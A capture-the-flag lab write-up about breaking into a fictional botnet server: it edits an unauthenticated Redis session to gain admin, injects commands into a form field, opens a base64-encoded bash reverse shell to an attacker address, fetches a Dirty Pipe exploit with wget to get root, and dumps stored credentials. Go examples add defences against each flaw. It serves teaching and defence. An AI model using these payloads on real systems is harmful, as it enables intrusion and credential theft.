Bot Busters Lab
Get ready for an exciting mission! You need to join an operation to complete a critical mission to detect a botnet group lurking in the dark corners of the cyber world. Recent cyber intelligence reports indicate that a group behind several DDoS attacks in the past is planning to launch several DDoS attacks in the near future. Many companies, institutions and organizations are known to be targeted. As a result of the analysis and research, a server used by the attackers was identified. It is thought that a botnet network is used through this server. We will reach the exact result after your research. You will start your mission to uncover these attackers who have caused many services to collapse and chaos to reign. In order to stop the cyber attackers behind these botnet attacks, you will first need to take over their botnet site and server. This will stop the attacks and identify who their targets are. This exciting mission will require the highest level of strategy and speed to use your technical knowledge to stop the cyber attack. Your courage, intelligence and skills will be the keys to combating the insidious threats of the cyber world.
What is the username of the developer of the website?
- First, scan the target with Nmap:
┌─[root@hackerbox]─[~]
└──╼ #nmap -sC -sV -p- blackbot.hv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-11 06:22 CST
Nmap scan report for blackbot.hv (172.20.22.183)
Host is up (0.00037s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9b:06:14:bb:07:6e:8e:a6:44:a5:e4:3f:8b:10:c4:f3 (RSA)
| 256 59:dc:c1:cc:da:04:83:fa:10:7d:97:49:48:0d:03:6a (ECDSA)
|_ 256 c3:23:40:a0:9b:22:71:19:87:4e:4d:7e:50:bf:21:24 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-title: Login - BlackBot
|_Requested resource was /login
6379/tcp open redis Redis key-value store 6.2.12
MAC Address: 52:54:00:55:EB:CE (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.71 seconds
┌─[root@hackerbox]─[~]
└──╼ #
- The Nmap result shows Redis, an open-source in-memory key-value store, listening on 6379 and reachable from the network. Redis has no authentication unless requirepass or an ACL is configured, so an exposed instance is worth checking before touching the web app.
- I register an account and log in. The menu has an attack panel with a target IP field and an attack type, but the function is only usable with a premium account.
- Redis accepts connections without a password. The single key in the database is the web session: the key is the value of the sessionID cookie and the value is a JSON blob that carries the authorization flags. I change isAdmin and isPremium directly from false to true.
┌─[root@hackerbox]─[~]
└──╼ #redis-cli -h blackbot.hv
blackbot.hv:6379> info keyspace
# Keyspace
db0:keys=1,expires=0,avg_ttl=0
blackbot.hv:6379> select 0
OK
blackbot.hv:6379> keys *
1) "401cdc07-1c3a-4fb8-904b-120b8d4c667a"
blackbot.hv:6379> get 401cdc07-1c3a-4fb8-904b-120b8d4c667a
"{\"userID\":\"8b61ae99-cca5-4a6f-bbbf-7acce2021a6d\",\"username\":\"kai0kid\",\"isAdmin\":false,\"isPremium\":false}"
blackbot.hv:6379>
- A small edit gives us admin rights and a premium account:
blackbot.hv:6379> set "401cdc07-1c3a-4fb8-904b-120b8d4c667a" "{\"userID\":\"8b61ae99-cca5-4a6f-bbbf-7acce2021a6d\",\"username\":\"kai0kid\",\"isAdmin\":true,\"isPremium\":true}"
OK
blackbot.hv:6379> get "401cdc07-1c3a-4fb8-904b-120b8d4c667a"
"{\"userID\":\"8b61ae99-cca5-4a6f-bbbf-7acce2021a6d\",\"username\":\"kai0kid\",\"isAdmin\":true,\"isPremium\":true}"
blackbot.hv:6379>
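The session store above trusts whatever JSON sits under the session key, so a single SET from any Redis client is a privilege escalation. The real fix is to keep Redis off the network (bind to loopback, set requirepass or an ACL) and to derive authorization from the user table on each request rather than caching it in the session; as a second layer, the application can authenticate the blob it stores so that a tampered value is rejected. The example below is added here and is not the lab application's code; the Session struct mirrors the JSON seen in redis-cli, and the key, the blob format and the TamperFlags helper are assumptions made for the demonstration. It is in Go because the target application is written in Go.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Session mirrors the JSON the lab app keeps in Redis under the sessionID key.
type Session struct {
	UserID    string `json:"userID"`
	Username  string `json:"username"`
	IsAdmin   bool   `json:"isAdmin"`
	IsPremium bool   `json:"isPremium"`
}

// LoadTrusting is the pattern the lab app evidently follows: whatever JSON sits
// under the session key is believed as-is, so anyone who can SET the key is admin.
func LoadTrusting(raw string) (Session, error) {
	var s Session
	err := json.Unmarshal([]byte(raw), &s)
	return s, err
}

// Seal encodes the session as "<b64 json>.<b64 hmac-sha256>". The key never
// leaves the application, so a Redis client cannot mint a valid tag.
func Seal(s Session, key []byte) (string, error) {
	payload, err := json.Marshal(s)
	if err != nil {
		return "", err
	}
	return encode(payload) + "." + encode(tag(payload, key)), nil
}

// LoadVerified recomputes the tag and refuses any blob that does not match.
func LoadVerified(sealed string, key []byte) (Session, error) {
	var s Session
	dot := strings.LastIndexByte(sealed, '.')
	if dot < 0 {
		return s, errors.New("malformed session blob")
	}
	payload, err := base64.RawURLEncoding.DecodeString(sealed[:dot])
	if err != nil {
		return s, err
	}
	got, err := base64.RawURLEncoding.DecodeString(sealed[dot+1:])
	if err != nil {
		return s, err
	}
	if !hmac.Equal(got, tag(payload, key)) {
		return s, errors.New("session integrity check failed")
	}
	err = json.Unmarshal(payload, &s)
	return s, err
}

// TamperFlags replays the redis-cli edit from the writeup against a sealed blob:
// the attacker rewrites the JSON to isAdmin/isPremium=true but cannot update the tag.
func TamperFlags(sealed string) (string, error) {
	dot := strings.LastIndexByte(sealed, '.')
	if dot < 0 {
		return "", errors.New("malformed session blob")
	}
	payload, err := base64.RawURLEncoding.DecodeString(sealed[:dot])
	if err != nil {
		return "", err
	}
	var s Session
	if err := json.Unmarshal(payload, &s); err != nil {
		return "", err
	}
	s.IsAdmin, s.IsPremium = true, true
	edited, _ := json.Marshal(s)
	return encode(edited) + sealed[dot:], nil
}

func tag(payload, key []byte) []byte {
	m := hmac.New(sha256.New, key)
	m.Write(payload)
	return m.Sum(nil)
}

func encode(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

func main() {
	key := []byte("server-side-secret-never-in-redis") // assumption: loaded from config in a real app
	orig := Session{UserID: "8b61ae99-cca5-4a6f-bbbf-7acce2021a6d", Username: "kai0kid"}
	sealed, _ := Seal(orig, key)
	forged, _ := TamperFlags(sealed)
	_, err := LoadVerified(forged, key)
	fmt.Println("tampered blob accepted:", err == nil)
}
```

The MAC only protects integrity: it stops a Redis write from granting admin, but it does nothing about an attacker who can also read the key, and it does not replace network isolation of Redis. Storing only the user ID in the session and looking the flags up per request removes the flags from the attack surface entirely.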
- With admin rights and a premium account, I launch a test attack against localhost (127.0.0.1).
- Inspecting the request in Burp Suite shows the following body:
POST /attack HTTP/1.1
Host: blackbot.hv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://blackbot.hv
Connection: keep-alive
Referer: http://blackbot.hv/attack
Cookie: sessionID=401cdc07-1c3a-4fb8-904b-120b8d4c667a
Upgrade-Insecure-Requests: 1
Priority: u=0, i
target=127.0.0.1&type=tcp-syn-flood
- The target parameter can be used for command injection. A time-based probe first:
POST /attack HTTP/1.1
Host: blackbot.hv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://blackbot.hv
Connection: keep-alive
Referer: http://blackbot.hv/attack
Cookie: sessionID=401cdc07-1c3a-4fb8-904b-120b8d4c667a
Upgrade-Insecure-Requests: 1
Priority: u=0, i
target=127.0.0.1%26sleep${IFS}5s&type=tcp-syn-flood
- %26 is the URL-encoded form of &. In the shell, & between two commands runs the first one in the background and immediately starts the second without waiting for the first to finish, so the injected command runs even if attack.sh itself blocks.
- ${IFS} is the shell's internal field separator variable, which by default holds space, tab and newline. Unquoted, it expands to whitespace that the shell uses for word splitting, so it stands in for a literal space wherever a space in the payload would be filtered or awkward to encode.
- As intended, the response now takes about 5 seconds to arrive, which confirms that the injected sleep ran on the server.
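The behaviour above is what you get when a form field is spliced into a command line handed to sh -c. The example below is added here and is not the lab's main.go or attack.sh: VulnerableArgv reconstructs the handler shape that explains the observed injection, and SafeArgv shows the hardened form, which validates the target as an IP address, checks the attack type against a fixed list (only tcp-syn-flood is known from the captured request; the rest of the list is an assumption) and passes each field as its own argv entry with no shell in between. RunEcho swaps ./attack.sh for echo so the demonstration is harmless; it assumes a POSIX sh on PATH.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"os/exec"
	"strings"
)

// allowedTypes is the fixed menu of attack types the form should offer. Only the
// value seen in the captured request is known; the rest of the list is an assumption.
var allowedTypes = map[string]bool{"tcp-syn-flood": true}

// VulnerableArgv reconstructs the handler shape that explains the observed
// behaviour (this is not the lab's source): the form fields are spliced into a
// command line handed to sh -c, so &, ;, | and ${IFS} are interpreted by the shell.
func VulnerableArgv(target, kind string) []string {
	return []string{"sh", "-c", "./attack.sh " + target + " " + kind}
}

// ValidateTarget accepts only a literal IPv4/IPv6 address and returns it normalised.
func ValidateTarget(raw string) (string, error) {
	ip := net.ParseIP(strings.TrimSpace(raw))
	if ip == nil {
		return "", fmt.Errorf("target %q is not an IP address", raw)
	}
	return ip.String(), nil
}

// SafeArgv validates both fields and builds an argv with no shell in between:
// each field is one argument, so shell metacharacters stay ordinary bytes.
func SafeArgv(target, kind string) ([]string, error) {
	ip, err := ValidateTarget(target)
	if err != nil {
		return nil, err
	}
	if !allowedTypes[kind] {
		return nil, errors.New("unknown attack type")
	}
	return []string{"./attack.sh", ip, kind}, nil
}

// RunEcho executes an argv with "./attack.sh" swapped for "echo" so the demo is
// harmless, and returns the combined output. Assumes a POSIX sh and echo on PATH.
func RunEcho(argv []string) (string, error) {
	cp := make([]string, len(argv))
	for i, a := range argv {
		cp[i] = strings.ReplaceAll(a, "./attack.sh", "echo")
	}
	out, err := exec.Command(cp[0], cp[1:]...).CombinedOutput()
	return string(out), err
}

func main() {
	payload := "127.0.0.1&echo${IFS}INJECTED" // the writeup's probe with sleep replaced by echo
	out, _ := RunEcho(VulnerableArgv(payload, "tcp-syn-flood"))
	fmt.Printf("vulnerable: %q\n", out) // a separate "INJECTED tcp-syn-flood" line appears
	if _, err := SafeArgv(payload, "tcp-syn-flood"); err != nil {
		fmt.Println("hardened:", err) // rejected before anything is executed
	}
	out, _ = RunEcho([]string{"./attack.sh", payload, "tcp-syn-flood"}) // argv form, even unvalidated
	fmt.Printf("argv without shell: %q\n", out) // the metacharacters come back literally
}
```

Validation and the shell-free argv are independent defences: the argv form alone already stops the injection, and the whitelist alone would stop it, but a handler that is ever refactored back to sh -c is safe only if the input was also constrained. If the panel is meant to accept hostnames as well as addresses, replace net.ParseIP with an equally strict hostname check rather than loosening the validation.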
- We can get a shell from here. I use the following payload:
POST /attack HTTP/1.1
Host: blackbot.hv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://blackbot.hv
Connection: keep-alive
Referer: http://blackbot.hv/attack
Cookie: sessionID=401cdc07-1c3a-4fb8-904b-120b8d4c667a
Upgrade-Insecure-Requests: 1
Priority: u=0, i
target=127.0.0.1%26echo${IFS}'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4yMC4yMi4xMjQvODg4OCAwPiYx'|base64${IFS}-d|bash&type=tcp-syn-flood
- Explanation of the payload: the base64 string is decoded on the server and piped into bash; it is a Bash reverse shell pointing at my listener:
┌─[root@hackerbox]─[~]
└──╼ #echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4yMC4yMi4xMjQvODg4OCAwPiYx" | base64 -d
/bin/bash -i >& /dev/tcp/172.20.22.124/8888 0>&1
Start a listener on port 8888 before sending it!
- After sending the payload we have a shell. Reading main.go reveals the developer of the website, which is also the answer to this question:
┌─[root@hackerbox]─[~]
└──╼ #nc -lvp 8888
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.20.22.183.
Ncat: Connection from 172.20.22.183:37090.
bash: cannot set terminal process group (693): Inappropriate ioctl for device
bash: no job control in this shell
blackbot@comet:~/blackbot/cmd$
blackbot@comet:~/blackbot/cmd$ whoami
whoami
blackbot
blackbot@comet:~/blackbot/cmd$ ls
ls
attack.sh
cmd
main.go
blackbot@comet:~/blackbot/cmd$ cat main.go
cat main.go
package main
import (
"blackbot/internal/app"
)
func main() {
app.Run()
}
// Developer: @conjurer
blackbot@comet:~/blackbot/cmd$
==> The Answer : @conjurer
What is the email address of the user with the admin role of the website?
- I locate the website's database file:
blackbot@comet:~/blackbot/cmd$ find / -name "*.db" 2>/dev/null
find / -name "*.db" 2>/dev/null
/home/blackbot/blackbot/internal/storage/database/database.db
/var/cache/dictionaries-common/hunspell.db
/var/cache/dictionaries-common/wordlist.db
/var/cache/dictionaries-common/aspell.db
/var/cache/dictionaries-common/ispell.db
/var/cache/man/tr/index.db
/var/cache/man/ja/index.db
/var/cache/man/fr/index.db
/var/cache/man/pt/index.db
/var/cache/man/cs/index.db
/var/cache/man/hu/index.db
/var/cache/man/ru/index.db
/var/cache/man/zh_CN/index.db
/var/cache/man/sv/index.db
/var/cache/man/it/index.db
/var/cache/man/ko/index.db
/var/cache/man/de/index.db
/var/cache/man/da/index.db
/var/cache/man/sr/index.db
/var/cache/man/zh_TW/index.db
/var/cache/man/ro/index.db
/var/cache/man/pt_BR/index.db
/var/cache/man/sl/index.db
/var/cache/man/fi/index.db
/var/cache/man/es/index.db
/var/cache/man/uk/index.db
/var/cache/man/index.db
/var/cache/man/id/index.db
/var/cache/man/nl/index.db
/var/cache/man/pl/index.db
/usr/sbin/tcptraceroute.db
/usr/bin/traceproto.db
/usr/bin/lft.db
/usr/bin/traceroute6.db
/usr/bin/traceroute.db
/usr/lib/firmware/regulatory.db
- One of the results is a database file that belongs to blackbot. Reading it gives the answer: kai0kid is the account I registered myself, and its session showed isAdmin false, so the admin must be the other user, notorious.
blackbot@comet:~/blackbot/cmd$ cat /home/blackbot/blackbot/internal/storage/database/database.db
cat /home/blackbot/blackbot/internal/storage/database/database.db
(The file is a SQLite 3 database, so cat dumps raw pages; the output below is reduced to its readable parts. The dump also contains an identically defined sqlb_temp_table_11, a leftover from a schema edit, and the auto-indexes for the UNIQUE columns. The is_admin and is_premium values are stored as small integers inside each record header and do not appear as text, so the raw dump does not show them; the sqlite3 client would print them directly.)
CREATE TABLE "users" (
"id" TEXT NOT NULL,
"username" TEXT NOT NULL UNIQUE,
"email" TEXT NOT NULL UNIQUE,
"password" TEXT NOT NULL,
"is_admin" BOOLEAN NOT NULL,
"is_premium" BOOLEAN NOT NULL,
PRIMARY KEY("id")
)
8b61ae99-cca5-4a6f-bbbf-7acce2021a6d  kai0kid  kai0kid@gmail.com  $2a$14$gacNsQBamV4feXmB431FOeLdh4ts2wjojGjAOAWmu0JKsg02lMeiG
71719fd7-c694-4066-ab9a-b41d330c6d43  notorious  notorious.hackerz@gmail.com  $2a$14$EaH/vHO2TK6dvxj84veaQ.g1ka6MtPmujPtUj/qJNAxgzMg/fT7oa
(The password column holds bcrypt hashes with cost factor 14.)
blackbot@comet:~/blackbot/cmd$
==> The Answer : notorious.hackerz@gmail.com
What is the CVE code of the vulnerability that can be used for privilege escalation?
- I check the kernel version:
blackbot@comet:~/blackbot/cmd$ uname -a
uname -a
Linux comet 5.11.0-051100-generic #202102142330 SMP Sun Feb 14 23:33:21 UTC 2021 x86_64 GNU/Linux
blackbot@comet:~/blackbot/cmd$
Vulnerability details: CVE-2022-0847 ("Dirty Pipe"). A flaw in how the Linux kernel handles pipe buffer flags lets an unprivileged local user write into the page cache of any file it can open for reading, so read-only files, including SUID root binaries, can be overwritten. Affected: Linux 5.8 up to the fixes in 5.16.11, 5.15.25 and 5.10.102. The 5.11.0 kernel above falls squarely inside that range (on a vendor kernel a backported fix can hide behind a lower version number, so treat the version check as a strong indicator rather than proof; the exploit below confirms it here).
==> The Answer : CVE-2022-0847
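Checking a uname string against the affected ranges by hand is error-prone because three stable branches were fixed at different patch levels. The helper below is an added example, not part of the writeup or of any exploit: it parses the release string and applies exactly the ranges quoted above (vulnerable from 5.8; fixed at 5.10.102, 5.15.25 and 5.16.11, with every later kernel treated as fixed). It is in Go to stay in one language with the other examples on this page, and it carries the same caveat about backported fixes on distribution kernels.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
)

type kver struct{ major, minor, patch int }

// verRe matches the leading major.minor[.patch] of a uname -r string such as
// "5.11.0-051100-generic"; the build suffix after the patch level is ignored.
var verRe = regexp.MustCompile(`^(\d+)\.(\d+)(?:\.(\d+))?`)

// ParseKernel extracts the numeric version from a kernel release string.
func ParseKernel(release string) (kver, error) {
	m := verRe.FindStringSubmatch(release)
	if m == nil {
		return kver{}, fmt.Errorf("unrecognised kernel release %q", release)
	}
	v := kver{}
	v.major, _ = strconv.Atoi(m[1])
	v.minor, _ = strconv.Atoi(m[2])
	if m[3] != "" {
		v.patch, _ = strconv.Atoi(m[3])
	}
	return v, nil
}

func (a kver) less(b kver) bool {
	if a.major != b.major {
		return a.major < b.major
	}
	if a.minor != b.minor {
		return a.minor < b.minor
	}
	return a.patch < b.patch
}

// DirtyPipeAffected reports whether a mainline kernel at this version predates the
// CVE-2022-0847 fix: vulnerable from 5.8, fixed in 5.10.102, 5.15.25 and 5.16.11.
// Distribution kernels may carry a backport, so a "true" here is a lead, not proof.
func DirtyPipeAffected(release string) (bool, error) {
	v, err := ParseKernel(release)
	if err != nil {
		return false, err
	}
	if v.less(kver{5, 8, 0}) {
		return false, nil // the flawed pipe code was introduced in 5.8
	}
	fixes := []kver{{5, 10, 102}, {5, 15, 25}, {5, 16, 11}}
	for _, f := range fixes {
		if v.major == f.major && v.minor == f.minor {
			return v.patch < f.patch, nil // same stable branch: fixed at that patch level
		}
	}
	return v.less(kver{5, 16, 11}), nil // other branches: anything before the mainline fix
}

func main() {
	release := "5.11.0-051100-generic" // the uname -r value from the lab box
	affected, err := DirtyPipeAffected(release)
	fmt.Println(release, "affected:", affected, "err:", err)
}
```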
What is the phone number of the attackers?
- As in the previous question, I use CVE-2022-0847 to escalate privileges. I save the exploit (the exploit-2 variant, which takes the path of a SUID root binary to overwrite as its argument) as k.c and start an HTTP server to transfer it to the victim:
┌─[root@hackerbox]─[~]
└──╼ #nano k.c
┌─[root@hackerbox]─[~]
└──╼ #python3 -m http.server 88
Serving HTTP on 0.0.0.0 port 88 (http://0.0.0.0:88/) ...
- On the victim I download it with wget and compile it with gcc, which has to be present on the target (it is here). gcc already produces an executable file, so the chmod +x that follows is redundant but harmless.
blackbot@comet:~/blackbot/cmd$ wget http://172.20.19.90:88/k.c
wget http://172.20.19.90:88/k.c
--2025-11-11 11:16:14-- http://172.20.19.90:88/k.c
Connecting to 172.20.19.90:88... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7752 (7.6K) [text/x-csrc]
Saving to: ‘k.c’
0K ....... 100% 179M=0s
2025-11-11 11:16:14 (179 MB/s) - ‘k.c’ saved [7752/7752]
blackbot@comet:~/blackbot/cmd$ ls
ls
attack.sh
cmd
k.c
main.go
blackbot@comet:~/blackbot/cmd$ gcc -o e k.c
gcc -o e k.c
blackbot@comet:~/blackbot/cmd$ ls
ls
attack.sh
cmd
e
k.c
main.go
blackbot@comet:~/blackbot/cmd$ chmod +x e
chmod +x e
- This exploit variant needs a SUID root binary to overwrite. I list the candidates and escalate as follows:
blackbot@comet:~/blackbot/cmd$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/su
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
blackbot@comet:~/blackbot/cmd$ ./e /usr/bin/passwd
./e /usr/bin/passwd
whoami
root
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@comet:/home/blackbot/blackbot/cmd#
- With root I go to /root and read secret.txt:
root@comet:/# cd root
cd root
root@comet:/root# ls
ls
secret.txt targets.txt
root@comet:/root# cat secret.txt
cat secret.txt
root:rqmTPUHH42X7PgArJbHLvfdm
blackbot:hzacsrVawKfMu4CChQvF7drh
paradox:mn9adH8xvdVjMaYmPdwSmrhH
URL: darkwebbotnet.com
Username: ShadowBotMaster
Password: Ph4nt0mC0mm4nd
URL: cyberhackerzforum.org
Username: StealthScripter
Password: Z3r0C00lH@ck
URL: dsmplkwtzrxy.com
Phone: +1(555)123-4567
Password: X9s#4@2hT*
URL: malwaremafia.net
Username: InfectedCoder
Password: M@lwareK1ngP1n
root@comet:/root#
==> The Answer : +1(555)123-4567
What are any of the addresses targeted by the attackers?
- Read targets.txt:
root@comet:/root# ls
ls
secret.txt targets.txt
root@comet:/root# cat tar*
cat tar*
examplecorp.com
fakesolutions.net
bogusindustries.org
fictitiousbiz.co
phonyenterprises.biz
fakeglobal.net
imposterco.io
nonexistentcorp.net
hackerlogistics.org
pretendventures.org
unrealtech.com
root@comet:/root#
==> The Answer : unrealtech.com